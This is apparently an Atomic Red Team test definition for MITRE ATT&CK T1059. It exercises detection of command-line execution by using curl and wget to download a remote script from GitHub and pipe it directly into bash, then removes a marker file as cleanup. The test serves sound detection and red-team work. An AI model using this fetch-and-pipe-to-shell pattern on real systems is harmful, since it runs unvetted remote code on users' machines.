---
attack_technique: T1059
display_name: Command-Line Interface

atomic_tests:
- name: Command-Line Interface
  auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
  description: |
    Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.

    Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
  supported_platforms:
    - macos
    - linux

  executor:
    name: sh
    command: |
      curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash
      wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash
    cleanup_command: |
      rm /tmp/art-fish.txt
